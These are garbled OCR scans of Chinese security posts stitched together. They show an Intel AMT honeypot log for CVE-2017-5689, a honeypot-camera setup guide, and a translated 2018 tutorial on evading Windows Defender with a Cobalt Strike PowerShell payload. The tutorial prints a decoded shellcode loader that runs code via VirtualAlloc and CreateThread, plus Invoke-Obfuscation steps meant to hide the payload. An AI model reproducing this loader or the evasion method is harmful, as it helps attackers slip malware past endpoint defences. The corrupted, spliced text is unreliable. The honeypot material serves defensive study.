ade-Insecure-Requests: 1 
Mozilla/5.0 





: Diges 


multiple 
multiple 
multiple 
multiple 
multiple 
multiple 
multiple 
multiple 
multiple 
multiple 
multiple 
multiple 
multiple 
multiple 


к, uri-"/index.htm", 
S", Qqopsauth, 


response 


response . 
.WriteHeader 
.WriteHeader 
.WriteHeader 


response 
response 
response 


response. 
response. 
.WriteHeader 


response 


response. 
response. 
.WriteHeader 


response 


response. 
.WriteHeader 
response. 


response 





.WriteHeader 


nc-00000001, 


WriteHeader 


WriteHeader 
WriteHeader 


WriteHeader 
WriteHeader 


WriteHeader 


WriteHeader 


ty В o) 16:51 7 


Save 










Ubuntu; Linu _64; (f 4.0) Gecko/20100101 
appl atlon/ q=0.9, q=0.8 
, uris"/index.htm", 
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, ncz00000001, 


输入 127.0.0.1:16992， 登 陆 Intel AMT Web 界 面 


intet® Active Manageme 





& 127.0.0 





Log 





Log on to Intel® Active Management Technology on this computer. 


Log On 





Log On 


Log on to Intel® Active Management Technology on this computer. 


? Authentication Required 





在 Terminal 中 


2017/06/22 
2017/06/22 
2017/06/22 
2017/06/22 


2017/06/22 
2017/06/22 
2017/06/22 
2017/06/22 
2017/06/22 
2017/06/22 
2017/06/22 


logfile.txt 


16:20: 
16:20: 
10:20: 
5:207 


http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 


multiple 
multiple 
multiple 
multiple 
multiple 
multiple 
multiple 
multiple 
multiple 
multiple 
multiple 
multiple 
multiple 
multiple 
multiple 
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response 


response 


response 
response 


response. 
.WriteHeader 


response 


response. 
response. 
.WriteHeader 


response 


response. 
response. 


Cancel 





.WriteHeader 
response. 
response. 
.WriteHeader 
response. 
response. 
.WriteHeader 
.WriteHeader 


WriteHeader 
WriteHeader 


WriteHeader 
WriteHeader 
WriteHeader 


WriteHeader 
WriteHeader 


WriteHeader 
WriteHeader 


calls 
calls 
calls 
calls 
calls 
calls 
calls 
calls 
calls 
calls 
calls 
calls 
calls 
calls 
calls 





logfile.txt [Read-Only] (-/amthoneypot) - gedit 






















If-Modified-Since: Thu, 22 Jun 2017 08:06:22 GMT 
Referer: http 0.0.1:16992/index.htm 
User-Agent: Moz {5.9 (X11; Ubuntu; Linux x86 64; rv:54.0) Gecko/201001 
Firefox/54.0 
39:45 CST 


mihursday, 22-Jun-17 1 
Remote: 127.0.0.1:4202 

GET /logo.gif HT 

127 

Accept: */ 

jmAccept-Encoding: gzip, deflate 

Accept-Language: en-US,en;q=0.5 

Connection: keep-alive 

If-Modified-Since: Thu, 22 Jun 2017 08:06:22 GMT 

Referer: htt 7.0.0.1:16992/index.Atm 


/5.0 (X11; Ubuntu; Linux x86 64; rv:54.0) Gecko/20100101 








Accept-Encoding: gzip, deflate 
Accept-Language: en-US,en;q=0.5 
Connection: keep-alive 





黑客 在 利用 CVE-2017-5689 远 程 管理 Intel AMT Web 系 统 ， 并 利用 该 漏洞 来 控制 存在 风险 的 PC、 笔 
记 本 电脑 和 服务 器 时 ，AMTHoneypaot 密 缸 监 听 16992 端 口 ， 同 时 在 Terminal 中 生成 行为 日 志 ， 复 制 
黑客 管理 服务 的 行为 ， 并 记录 在 logfile.txt 文 件 中 。 
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Honeypot-camera ЗЕРЕ (翻译 ) 


0x00 ІШЕ 


һопеуроі-сатега ЛЕ ЕНЕ 


0x01 安装 环境 


Ubuntu 16.04 LTS Python3.5 


0x02 搭建 环境 


安装 Python3.5 系统 自 带 版 本 为 Python2.7 
Python 2.7.12 (default, Nov 19 2016, 06:48:10) 





[GCC 5.4.0 20160609] on Linux2 


python sudo apt-get update sudo apt-get upgrade 
Python 3.5.2 (default, Nov 17 2016, 17:05:23) 
[Gcc 5.4.0 20160609] on Linux 


输入 python 时 默认 启动 python2.7， 更 改 python 默 认为 3.5 sudo update-alternatives --install 
lust/bin/python python /usr/bin/python2 100 sudo update-alternatives --install /usr/bin/python 
python /usr/bin/python3.5 200 





安装 最 新 版 pip wget 

toor@toor-virtual-machine:~$ wget https://bootstrap.pypa.io/get-pip.py 
--2017-06-20 16:14:51-- https://bootstrap.pypa.io/get-pip.py 

Resolving bootstrap.pypa.io (bootstrap.pypa.io)... 151.101.128.175, 151.101.0.17 
555151:101,192/1455, М 

Connecting to bootstrap.pypa.io (bootstrap.pypa.io)|151.1081.128.175|:443... conn 
ected. 

HTTP request sent, awaiting response... 200 OK 

Length: 1595408 (1.5M) [text/x-python] 

Saving to: 'get-pip.py' 


get-pip.py 1.52M 29.7KB/s іп 575 


2017-06-20 16:15:59 (27.1 KB/s) - ‘get-pip.py’ saved [1595408/1595408] 
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sudo python3 get-pip.py 


Mi eai к ДЫ digs вкте; Eis pw es 5 де: pip: Py 


ctory is Rot owned 
ck the permissio 
want sudo 


by +k 
15 and o 
H flaq. 


Downloadin ip-9.0.1-py2.py3-none-any.whl (1.3MB) 
тоох Н з 5 6: 


Collecting setuptools 


Downloading setuptools-36.0.1-py2.py3-none-any.whl (476kB) 
тоох | 131k5 266/5 


Collecting wheel 


Downloading wheet-6.29.6-py2.py3-none-any.wht (66kB) 
“CU | rio 152) 


Installing collected packages: pip, setuptools, wheel 
Successfully installed pip-9.0.1 setuptools-36.0.1 wheel-0.29.0 


sudo pip3 install ipython[all] 


Running setup.py install for simplegeneric ... done 

Running setup.py install for tornado ... done 

Running setup.py install for pandocfilters ... done 

Found existing installation: html5lib 0.999 

Uninstalling html5lib-9,999: 
Successfully uninstalled html5lib-0.999 

Running setup.py install for terminado ... done 
Successfully installed Sphinx-1.6.2 alabaster-0.7.10 babel-2.4.0 bleach-2.0.9 dec 
orator-4.0.11 docutils-0.13.1 entrypoints-0.2.3 html5lib-0.999999999 imagesize-0. 
7.1 ipykernel-4.6.1 ipyparallel-6.9.2 ipython-6.1.0 ipython-genutils-0.2.0 ipywid 
gets-6.0.0 jedi-0.10.2 jsonschema-2.6.9 jupyter-client-5.0.1 jupyter-core-4.3.0 m 
istune-0.7.4 nbconvert-5.2.1 nbformat-4.3.0 nose-1.3.7 notebook-5.0.0 pandocfilte 
rs-1.4.1 pickleshare-9.7.4 prompt-toolkit-1.0.14 pygments-2.2.0. python-dateutil-2 
.6.0 pytz-2017.2 pyzmq-16.0.2 qtconsole-4.3.0 simplegeneric-0.8.1 snowballstemmer 
-1.2.1 sphinxcontrib-websupport-1.0.1 terminado-0.6 testpath-0.3.1 tornado-4.5.1 
traitlets-4.3.2 wcwidth-0.1.7 webencodings-0.5.1 widgetsnbextension-2.9.0 


0x03 图 形 化 


安装 Tornado Web 依 赖 包 sudo apt-get install python-pycurl pip install tornado 


toor@toor- vtrtual- AN ~$ sudo pip install tornado 
ine wen tory home / j. cac ibd ip/http' or its parent directory is not owned 
urrent ; ache been disabled. Please check the permission 
If executing pip with sudo, you may want sudo. s 


ache/pip' or its parent directory is not owned bv th 
“hing wheels has been disabled. check the permissions and о 
г. If executing pip with sudo, you may want sudo's -H flag. 


Downloading tornado-4.5.1.tar.gz (483КВ 
100% ee 491КВ 69kB/s 


Installing collected packages: tornado 
Running setup.py install for tornado ... done 
Successfully installed tornado-4.5.1 
安装 Python PIL 依 赖 包 sudo apt-get install python-imaging 下 载 PIL 的 源 包 
这 里 下 载 的 是 Python_Imaging_Library 1.1.7 Source Kit( 
all plattorms ) (November 15 2009) 





PIL 1.1.7 
(1 ython Imaging Library 1.1 > Kit all platforms) (November 15, 2009) 
• Python Imaging Library 1. Python 2.4 (Windows only) 
« Python Imaging Library 1. i 

e Python Imaging Library 1. 

• Python Imaging Library 1 



















1 2.5 (Windows only) 
2.6 (Windows only) 
or Python 2.7 (Windows only) 


1 
1. 
1 





下 载 后 将 其 解压 ， 并 进入 目录 进行 安装 python setup.py install 


0x04 #єЗ& 


下 载 honeypot-camera git clone 安装 honeypot- 


camera 进入 下 载 目录 ， 运 行 camera.py python camera.py 
root@toor-virtual-machine:/home/toor# cd /home/toor/Honeypot /honeypot-camera-mas 


ter/ 
root@toor-virtual-machine: /home/toor /Honeypot/honeypot -camera-master# python cam 





ега.ру 


安装 成 功 打开 浏览 器 输入 127.0.0.1， 成 功 显示 页 面 
COMPANY Facility Management - Mozilla Firefox ty 4) 1055 4% 





€ 127.0.0.1 у а + » = 


COMPANY Facility Management -- Security 
Observation Camera 





0x05 工作 机 制 
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界面 不 断 刷 新 ， 平 均 5 秒 更 新 一 次 画面 ， 并 存储 在 img 文 件 夹 中 ， 名 为 camera.jpg 的 图 像 文件 


Honeypot honeypot-camera-master img 





© 
Q 
fm Desktop camera, pg Lighthouse.jpg 
D 


13499/firefox 
tcp ө 192.168.36.225:50186 52.37.48.84:443 ESTABLISHED 
13499/firefox 
tcp 9 127.0.0.1:57886 127.0.0.1:80 TIME_WAIT 
6 127.0.0.1:57860 127.0.0.1:80 TIME WAIT 
2) 127.0.0.1:57852 127.0.0.1:80 TIME WAIT 


0 127.0.0.1:57868 127,0.0,1:80 TIME WAIT 


6 192.168.36.225:57610 13.32.230.33:443 TIME WAIT 


tcp ө 192.168.36.225:56742 117.18.237.29:80 ESTABLISHED 
13499/firefox 


tcp 127.0.0.1:57864 127.0.0.1:80 TIME WAIT 


127.0.0.1:57854 127.0.0.1:80 TIME WAIT 





127.0.0.1:57768 127.0.0.1:80 ESTABLISHED 
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(3EX)Cobalt Strike (ЕН ЖЖ SE windowsDefender 


БУ: 
(2018-03) 


对 于 这 样 一 篇 18 年 的 文章 我 们 发 现 目前 由 于 攻防 软件 的 升级 ， 目 前 已 经 不 再 适用 绕 过 了 ， 但 是 其 中 
的 一 些 手 法 和 方式 仍然 值得 学 习 借 鉴 ， 针 对 新 工具 下 的 攻防 仍 待 进一步 学 习 研 究 。 

0x01 前 言 

对 所 有 红 队 来 说 想 要 提交 个 payloads 并 不 触发 任何 告警 一 直 是 一 个 挑战 。 就 像 所 有 安全 检测 方案 一 


样 ，Windows Defender 可 作为 测试 如 Cobalt Strike 生 成 的 payload 的 一 个 检测 工具 。 


0x02 分 析 


在 这 个 样本 中 我 们 将 会 使 用 Cobalt Strike 生 成 一 段 powershell payload， 之 后 看 看 我 们 如 何 操作 他 并 
让 它 绕 过 一 台 Windows10 PC 的 Windows Defender。 这 或 许 并 不 是 最 优雅 或 者 最 简单 的 方法 在 
Windows Defender 防 护 下 隐藏 你 的 payloads， 但 是 这 是 我 们 使 用 过 的 有 效 的 方法 之 一 。 


创建 payload 的 过 程 如 下 : 





user computer note 
LAB-windows2008 WIN-ODSELSORSDK 
LAB-windows2008 WIN-ODSEL9SORSDK 

BR Payload Generator = 口 


This dialog generates a payload to stage a Cobalt Strike 
listener. Several output options are available 


Listener: http ” Add 


Output: PowerShell Command 
s2008@192. 168. 145.133 (WIN-ODS 
x64: 7 Use x64 payload 


520088192.168.145. 133 (WIN-ODSH Саса Help 





经 测试 发 现 这 里 分 析 不 包括 x64 情 况 ， 因 为 x64 生 成 的 代码 后 面 会 生成 
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这 会 生成 包含 有 PowerShell 指 令 的 一 个 文件 payload txt 





ADQAGAF GA WA x AOQAUNA S AC dx A twas Мум > AE WADA LACOAC 08} а BAEK AKA T AHOAOQBGAGQA Muddy AF LA COBRAGCACABR ADE ANU 
en LAGAIAL gBKAEVAAAB SAFE AMOR TAFQARORAA GO ORL AGK ATER? A OAK 3 Я э ма d Q du (DIT 
MALTY ASV AF Sag non a) wt: AGAANCH | ADORA BA Ó. е уе 人 
MASA А586 8 J ADS, Abra АС SA, ; 3 ASQ 
JA Y ABuAGY AT АЙМАС« АОВ ОАА YwE BAT ы. IA AAMAAIAA L ADR АПАЕ Y Abl AC ANY x 
Ñ ANUAS QBEAY ОА ОВЧА мА гав А ÁARQUI AWULABU Met AAABTADGAMABYAF Y MM ү АМАЛЫ AH T АДАА y AE К ACAI AL CAGE LAC SANGOMA LAG: М 1 Pneus 
G $ АРЕАЛА. TARABE g 143471 ANCA AF GAPaEEAOQAVglhAF g € y ЕСА ғасса : м бс 64GB 5 AGGA 
RATAA LANTAI ДАЛАДА AAGAB2 AF TADOR АССА у GAA RUADQIA МУДА / Ask e QRDAEMA T gi > 1 ; қоға 2 Аста Анг ууй 5А, 
HLAZQUSAF 1 АУМФС AGE ARIAL QA. AC y AC Арме v AG ЪАК а В ALIA ! 8! ALY Адай 1 с T Ms HAAAAADALE А ОША RADAR | ARQACNAZADQRN AMT 
[IA YA y BF AAZA Ж RARE AGUAARA LAD GAG ABNAE CAOORIADAAUABARGAANABXAFL АУМФУАҒС А Ou SA E KA t 4 , £A 3 k AE nA CBR „ё 
BC АК, А үй LWIRADOQA RIA AHNAQQE ? ADK Ab AMUA ORLA kA AQR Y AF AAORBIAET AV AB SAT OAM i AF Y AGB / ADRA J me VAAOAE oAAAB TARR Abad! 
ын рүү mA ОА AN SAQUE А AC ORAM SAEQBZAEAabAag at OAT С АД v AJ LI Ан vrais E t tat ЗАО АСЫ 
аА L A SAB tA QAQNE AE Qaa. 4 ABC ADMARIB LAG I AQ BRAC BACK ЗАСАА T: 854:042084ҮҒ САФ ЗАГ AA ARCA "Tem 
LE AR hAH CANIT f AaARBADY ANCUS QAW Агу МУЗ AUARY ACK ALR) AGEASABT ATO HT JADRE AT LA7QBZAG 1 
MA v AË UAQQSACY AXCIIAGOAUR LAE AB SAL ТАМАРА AL AGAR IAL KAY GASACMAAA LAIMA Si Bk, t vA RLADC AY nt 
Mi AACR TAP EA VOB} AEEARABCADLAVORSNACORA EGR TARY AUAA SANT Ауа АҒЫМ ОА? SA aAA жом JA LARA Sw B bd. SANWAR ALE 
FANGRAAELASqRZ AFVAZU Y ARR ACH A SARI AE САУА AE САСА AOL АСЕК АС Ad Y " ^ Арх Аф 
Mec &AZABTAFUAZ GB J AGOAPQIÉ ) АДДА VAB DANA ТС ВЗАЁ AAT QAXAL IARAKZALL Ft A SA дады m lid 
AP WAWARK АТАБА ФАА LAeQAC АНМАМОВ ? AGSAYOB TAFUA YAR AMAARABK АЁ T AUQRLARAALwR "m {Алей к ADUASQRSA Ах АЁ c АДАЙКА 
f gAYQR 2АГ c ARABv ADAALWAQAT C AAABE М, T AARAL ADT ASGORE ҒАС үй АСА Amd WALAA t APQUVATY Atilio ALADAR [AMT AC ма AGITAT хА AM, 
SOR EAHREADwÉULACKANMEBAC SAOABhAT LAZ4AA0DUAR GBS АЎ UA Ka LARAAD AP CAI ТАҒ A< - TETTIE Я 4 A ARDANE ALAR ЈАКА 
4 UIT. ANQBBAGKASAB? AC ее HE A0Q8 JAE SAY NELE Е E 8 AA A Vive mete Ak BAY ARMAR AR 
AA Lk AMI veo per) 3AGY Abg LARTAT AR CADAAMGRIAHILAT АЙТ ADMA FO AJ TX acil T ENAK ШҮ ANa 
A nh BAK ЖАЫ, { АУА «АЙДА MBF ADT AT AA SAMOGA Q8FA T ACOB2 AF KANARRAE GAZ AA т АЖА? witA AG АМАБ 
балбал қа , 2 Mas v ADY bw V АНС лува MRR z ho0ADQRhAEDANQA SAF CAVYQBEAOL Aca LOE ба 2080. 
DY АҺААЙАПМА 7 у) Ar AWAAv AGQAY QA SAMOA GMT AHYA / AAGADUAMAG5A7 LANA AMAA y ADQADCRA A 
QUOAGY AVARGAL ЗАЙ QE QAM A v AME ALOR САДОЕ АСАУ GEL AGAR FAE мог Ta YAT Қасайзасоамайғын1 А 
JAA CWE SAGY АТ эВ АСАЛА QUEAF c ААВ г ААА УОЛ E ҚАТОАҒАНМАМЦӘ FAK T AVORNADORSAB LADI A SAB x AGAADOR V M 9 
FARy ADC AL ARWAC BADR Ч ANY AKA A AOTAGABGADQASQR LADAAQA ALC ARAR ADUAAABNADE AZ GRGA Ма МИ АРАФА ү AE А АК жйгу ADI AZ 
£ BAT ARGAMK Ae ARQADOAK WE) AELANQUYAF LAC ABE APR ATI LAOCAZABSADMA T OB LAS MORAL AOA ЗАМЧАМАЙ T AGE А, DAMA аму АОВ QA Gea Vll AC MA ААО 
ABAAQTAQuAy AE МАЗ ВОАС SAA т AL UA Ak ADK АЗОВ | AECAYOR LA Ax AH A SQRAAE SADARMA E БАУКА KAGA VINEIS 4 Y JRUAE s AOGUNAD Ама fe v HA 
ОАК AGORA ADUA Y , nard БАУ LAC GAT АСДА ДА! Аф AMA ү Al АМАА AGEANCIEV AT CAOQ СААЛ С р MQADAEVAL mae АД B Ауа 
АБСАНЧААНДАПЙААрЫАЛАССАБОАТАРҚАҢАЙ, AE UAC AB AE 35981 AGUAN BRAE CAOQBCACAA YOR SAGANKGEUAF GARMA JAGGARABNAT YACQETAN Aba Gr AGL ACQAY ACC Abl. 
ОВ 2 ADE Aoi | AO АБК АҒ АТАЛУ МАА АНМА еВ LAF DAFAR JAL s AZQARAGRA жабу AF QADOR s AOMAGOBOAT Y Ак жа gil t AS Ола TAE 4 АМАН V 
sea XADEAUQERAGCQAb ACA wA y AL MANQA4A D. ABO UACARaACOAYOR AL VACORIAMCACAREAT O. раз 1 Айг : à MRAR кам? 
FEAQQB I AK TARQAVAEUATgASAFUAVQR I АЁ Y ААЙ 2 AFAR SAE YASQRNAF LAE ТҮҮ АЙА ТЫ. Үт" TES ASAETATME y ART AN 
aaa i AKAR ALY ATARWADT ANO | А MOAR T ADGA GIL AF олса BAF AA SQUE ADE АСВ ЗАГ GARRAUAT RARARRAHLAYOR j ADI AR LADQAD ay A agi AG SAY най 
sep лама LAL BAO BS ZANQANGR АП ү РАУ А ТАВЦАС К АЈАВОАХ SAC QER OA@AASAL LAG AA2 TL: R f MRA ARK ALA CM: A AMORE А а AF YACOMMALY M 
B RAF LAVOE OL] Al we T AGY ЖУЙ AE OA dA RAGUA (Мол AO LAAABKAE 54406 XA ADABOAHEABARÉ 
E LADAR? AMGAQQEMAC ТАЛАДА AV ARS AE f Ada AY gi SAMY МАШАА ВААЙ ARAANAJ Bia e WE өз 
wA LARLAA efti QGADQUAMS SAT QA T 05444 RA YQ НЕ AYE ACHAQQE | A LADwIEQAGY AQASXAPAA TB LAE QA. AC 2082 m Ages t QA. 
MY AMAA SAE DAC OB OQAGE Adi ek балын Wi Abr УА CBAR A S GAEQAEOR ТАҒ САМАЯ ACMA DAB БЛАС АМАСАРрТАММФҒЫНДА? Ме А} 
BEAT KAdARnAERATARDAGE ATE JAVQAAAE GANGET AGOADSBQAOQAZ QRRAD' AL aDAFQUCE?ATOAVgRIV ADG ARB Ад ASCRT AGE Ау) Threats found 
MAAMAB LAL AMOR S ALIA TAY mAXAE ТА2дӘкАРА pp te yy PP ОА 
ABOAGUAGWATAE BAY ORCAGLY vite MCAASQBPACAAQNE v ALOR ABy AGUA CWB z AGL AbwiuA AAR WBOAGRACABTAHQAC 08 АСЕ АРОАОАСДАСУ 
С AAR v AGUA à с Ай k ACUAXQAUAADOARAB 1 АЧАТ АНАА OR АРМА: жАрАС LAKC АОБА ARVAT 


为 了 aid Windows Defender 我 们 需要 了 解 下 ，Cobalt Strike 是 如 何 创建 payloads 的 ， 并 且 希 望 当 修 
改 一 些 特征 让 Windows Defender 判 定 payloads 为 安全 。 


Virus А threat protection 


第 一 步 当 然 payload 指 令 base64 位 编码 ， 通 过 查找 格式 转化 或 者 通过 Powershell 指 令 追 加 - 


encodedcommand 标定 。 

为 了 解码 并 且 观 察 创建 payload 暂 时 先 跳 过 这 段 : 
powershell.exe -nop -w hidden -encodedcommand 
使 这 段 先 不 看 。 

然后 使 用 下 面 的 代码 反 编码 剩 下 的 字符 : 

这 里 测试 环境 失败 了 我 换 了 个 方式 : 

echo 'base64 payload' | base64 -d 


这 里 用 了 powershell base64 解 码 方式 : 
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function Dncoded-Base64String([string]$string) { 
$byteArray = [Convert]: :FromBase64String($string) 


[System. Text .UnicodeEncoding] : :Unicode.GetString($byteArray) } 
$wishwords = 'base64 payload here' 

$wishWords = Dncoded-Base64String $wishWords 
$wishwords.Substring(0) 





合成 解码 字符 包括 又 一 个 base64 编 码 的 字符 ， 但 是 尝试 解码 失败 并 出 现 乱码 ， 由 于 这 段 字 符 被 下 面 
的 Powershell 代 码 Gzip 压 缩 过 的 : 


ТЕХ (New-Object IO.StreamReader(New-Object I0.Compression.GzipStream($s[I0.Compr 


> 


进行 一 次 base64 之 后 结果 如 下 : 


төгуге: yg Vinc SabdectatP Min 1 А rRT IOP c 


хө 70008 Arb HON OP UO MP D KYL ВБ: eot des Sab Ty Уммү кө kg Sal Зых EERI 09 qtif^agt ом Tui y 1 
езтн PWV F NOB OMIM Aae gb t TDuPGo K cPrONG Bs LIC AR DC AC a2 23 

Mode рну tof apt дунё ан Артек возын aos A2 

vault LODE spt UFU187103/+ 264 2 r ARA vv he AK vu S 





现在 我 们 需要 知道 里 面 的 命令 那 一 部 分 payload 实 际 触发 了 Windows Defender。 通 过 一 些 谷歌 搜索 
发 现 这 段 PowerShell 脚 本 工具 可 用 于 解码 ， 如 这 个 链接 内 容 介 绍 : 


$data = [System.Convert]::FromBase64String('gzip base64') 

$ms = New-Object System.IO.MemoryStream 

$ms.Write($data, 0, $data.Length) 

$ms.Seek(0,0) | Out-Null 

$sr = New-Object System.10.StreamReader (New-Object System.IO.Compression.GZipStr 
$sr.ReadToEnd() | set-clipboard 


Gzip 解码 后 结果 如 下 : 
decode Gzip by powershell get: 
t-Strictmode -version 2 
Seicar = "`° 


фос = Ф 
$assembly = @” 
using System; 
using System, Runtime. Interopservices; 
namespace inject { 
public class func ( 
[flags] public enum Allocationiype | Commit = 011008, Reserve > @x2000 ) 
[Flags] public етшш MemoryProtection ( ExecuteReadWrite > Qy49 } 
[Flags] public enum Time : uint ( Infinite » @xFFFFFFFF ) 
[Olliwport(*kernel32.011")] public static extern IntPtr VirtualAlloc(IntPtr IpAddress, uint dwSize, vint flAllocetionType, uint flProtect); 
[Dll Import ("kernel 1")] public static extern IntPtr CreateThread(IetPte Ipthreadattributes, uint dwStacks IntPtr lpStartAddress, IntPtr IpParameter, uint dwCreationtlagy; 
IntPtr lpibreadid); 
(Oilisport("kernelj2.0117)] public static extern int WaltforSingleObject(IntPtr hMandle, Time dwMilliseconds); 


$compiler = New-Object Microsoft.CSharp.CSharpCodeProvider 

fparams < Mew-Object System.CodeDon. Compller.CompllerParameters 

$params .ReferencedAssemblies AddRange (8(" System. 117, (PsObject].Assembly Location) 
fperaes.GeneratelnMemory > $True 

$result < $ceompiler.ComphleAssesblyFrosSource($params, $assewbly) 


{Byte{]]$var_code = [System.Convert];:FromBase64String("/OQiJAAAAYIn1Md3k111wi11Mi11Ui31oD7dk) ]jH/McCsPGF8A1vgacSNAcf LAE JXLLIQUELRAdCLQULFWIRKAdBQI OY LI BRAG )PEwLN1551JH/ 

Fic Cswc ENAC AROMAJ 30k де ТҮ LigkAdimiwxi Í 18CAdOLBIsBOI lE CRbM2F ZWIM/AFhfWosS642daG5 1 dABod21uaVRoTHcmB/ /Vf9XV1dXV2g6Vnmn / SXphAAAAF sxyVFRagNRUNI41gAAU1BoOV4mf xv/ 

V638bHd JSaAACYIRSUIJTUIBo61UU0/ /VicaDwLAx/ LdXav9 TVmg t Ohh? / OWFwAs EwwE AADH/ hET0B The L0qsX1Xf ЛУЇ cFoRSFeHf /Mt 9XogdRV Bot 1 fgC/ /VvwAvAAASx3S3Mf / pROEAAON IAQAAG I v / / /ВУНОЗБЧААДАДАААААААДААДААААААААА 
АААААДААДАДАААДААДААДАААДААДАДАААААААААААДАДААДААДАДАААДААДААДААААДААДАДАДАҒУ z 2X1 tid 1bnQ6 TE Lem] s bGE VS Aw LCh jb21wYX8pYwx LOY SMUG LF TOEwL 5A7 VFdpbmitvd g] 10gNiay0yBX11c2NDsgVH3pzGVud( 821 jApOQoAR, 
ААЛААРАААДАЛААААААААЛАААЉААДААЛААААДАДААААААААДААААДАДААДАААДАААААААААААААААААЛАДААААДАДАААААААДААААДАААААЛАДАААДАДААААААДААДАДАААААДААААЛАДАААДААДАААДАААААААААДААЛАААААААААДАААДАААААДАААААА 
ААААААААДААААААААДААДАДАДАААААААААААДААААДААДАДААДАААААААААААДАЛАЛАААААААААЛАААААААААААДАДААААДАААВоВІН i VV / 
VakBoABAAAGgAAEAAV2hYpFP1/9WTUQAAAAABZVFT LedXaAAgAABTVgS Loni / MF vMTG Luc wa KAdeVYwe ip/f//MTkyL ҮЗ. kal. jEXOQARAAAA. ) 


Souffer = [inject.func]::VirtualAlloc(0, $var code.Length + 1, [inject. funcoAllocationType]: :Reserve 
inject. funceemoryProtection] : :£xecuteReadWrite) 
Af ((8001]!$buffer) { 

$global:result « 

return 


bor (inject. funcrALlocationtype): :Comit, [ 


[System.Runt ime. ToteropServices Marshal }<:Copy($var_code, ©, $buffer, $var, code.Length) 
[IntPtr] $thread » [inject.func]::CreateThread(0, 0, $buffer, ө, Ө, 8) 
Af ([eool]!$thread) í 

$global:result = 

return 


$result2 » [inject.func]::Waitrorsingleobject($thread, [inject.func+lime]:lafinite) 
% 


If ((1ntPtr]:tsize -eq 8) ( 
Start~job ( param($a) ТЕХ $a } -RunAs32 -Argument $Dolt | wait-fob | Receive-Job 


else, { 
TEX $0016 





个 脚本 会 第 一 步 执行 base64 解 码 字 符 并 且 解 压缩 最 后 得 到 整 段 代 码 。 最 后 复制 结果 到 剪 切 板 ， 执 
行 成 功 只 需要 粘贴 即 可 保存 。 


$var_code 值 即 存 放 着 被 WindowsDefender 检 测 的 payload， 我 们 需要 替换 并 绕 过 检测 防护 。 





一 步 解 码 $var_code 发 现 其 是 由 一 些 ASCII 字 符 构成 ， 但 是 这 里 并 不 需要 完全 解码 它 


$enc-[System.Convert]::FromBase64String('encoded string') 
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我 们 可 以 通过 下 面 的 代码 阅读 其 中 的 内 容 : 


$readString-[System.Text.Encoding]::ASCII.GetString(S$enc) 


рауіоаа& 13: 






h> 


在 上 面 的 信息 中 可 以 看 到 UA 及 攻击 者 IP。 


0x03 加 混淆 


目标 使 用 当前 的 payload 并 混淆 的 方式 会 触发 Windows Defender。 最 好 的 工具 并 且 可 选择 Invoke- 
Obfuscation 种 类 的 一 个 工具 是 Daniel Bohannon( 


启动 Invoke-Obfuscation 的 方式 如 下 : 


Import-Module .\Invoke-Obfuscation.psd1 
Invoke-Obfuscation 


现在 我 们 需要 定义 我 们 需要 混淆 的 payload 部 分 。 可 以 使 用 下 面 的 指令 ， 再 进行 一 次 混淆 操作 : 


Set scriptblock 'final base64payload' 
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插 一 句 ， 这 里 执行 的 时 候 其 实 是 触发 了 火绒， 但 是 Windows Defender 并 未 触发 ， 火 绕 放 行 即 可 : 


о 保护 历史 记录 


sow E? Windows 安全 中 心 的 机 新 保护 增 作 和 建议 


XA mn 


Q жаның 


A «ep 
4 防火墙 和 网 络 保护 


用 和 浏览 器 控制 


жмент 


Ж янып 





该 工具 会 获取 我 们 的 脚本 然后 询问 我 们 想 要 执行 混淆 的 方式 。 在 这 里 我 选择 了 COMPRESS， 选 择 
1。 这 并 不 意味 着 其 他 参数 不 起 作用 ， 只 是 作者 编写 时 发 现 这 个 有 效 。lnvoke-Obfuscation 处 理 并 输 
出 充分 混淆 后 的 PowerShell 命 令 ， 将 潜在 的 可 以 绕 过 Windows Defender. 
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之 后 打印 输出 保存 


Out с: Npayload.psi 


Pee 1 : 3 7 ; : 
и « d SED 4 РИКИ Азы ы es SURE s 2 
( SsMetLid[a HSshE1LId( 13] 4^" )( немов јест 10. Object TON.DEFLATesT ream [I0.MEmoryStreae] [CoNVErt]::frombaSté4s TRING( “17LfrqivtMyYf6Fxt/ 
5 jBy6 I SKQdREACAh 15 guoSNRAr 796 VXfY TICSTHIP w+ 7и + dBWBKC roe Sc FVGF Tp Tug tC 1,246 Рука иын? moC Boya Mot g yr Vf jL rA1265C 6 ЯЪА ЛА Ir OmE ETANAGA} XR SO Kct 26ybT богы? 25е fgpbAC j:qhplc/k«bbr 
vf jEoviCanzCTHTPr Em2d9fe 9 x95025UDr jnpnyULOLTvkowQux TL 38y2 j chu 300% q 9HUrvI ORpGy 154m zVAB 3 207 quU THs FB ) / BO 8f guNM f 2 3ле Ot dA /DY aqhoypUyVEK aXVELTHOIN27b 1711 LEIPTykPYOW t J 7OML 3NHSX7X 
dcSPXLS / pkTBEber 1f 2E CEaf a UTdLzRAV JHFO MAT tt 87 er mb x AROHRE C Ipi t Al ему jCPh9 2 +h EO SustMSY rx 3865 ae 200 t vidt pe Taag iT 4a ims T2 LaPOTEKGA RAGU +HDqEPF bey a Ve RMJ tbk LeupU? rSGNBwPhuOaP f j SNbV HAMO 1 1 > 
Ynxfu3TATTOeOvOLe sBétdYB1T) {ZF #752 30986G/xY jqT ]rnADoEXS 145 / 7m/ 1БУТЭФС LVhZ e f Az6xQH2 2AMUKEOP OPI RUBVf ynBO N22 сї. / рА= *. ) ‚| 10. COMPRESSION. Comprf 551 олеюбе |: :4ЕСоерйе55)) , [TExt.eNcO 
) .ReaDtorwof ) 





蔡 换 掉 原来 的 被 解压 的 payload 如 下 所 示 看 起 来 这 样 


fassembly = 8^ 

using System; 

using System. Runtime. InteropServices; 

namespace inject ( 

public class func { 

[Flags] public emm AllocationType ( Commit = @x1@@@, Reserve „ 0x2000 } 
[Flags] public enum MemoryProtection { ExecuteReadWrite = 8x40 ) 
[Flags] public enum Time : uint ( Infinite = OxFFFFFFFF } 
[D1lIaport("kernel32.d11")] public static extern IntPtr VirtualAlloc(IntPtr IpAddress, uint dwSize, uint flAllocationtype, uint flProtect); 
[DllIeport("kernel32.4117)] public static extern IntPtr Createfhread(IntPtr lpThreadAttributes, vint dwStackSire, IntPtr loStartAddress, IntPtr lpParameter, wint 
dwCreationFlags, IntPtr ipThreadId); 
[Dli Import (“kerne132.d)1°)} public static extern int MaitforSingledbject(IntPtr hMandle, Time duftilliseconds); 


$compiler = Wew-Object Microsoft CSharp .cSharplodeProvider| 

Sparams = New-Object System.CodeDom. Compiler. Compi LerParameters 

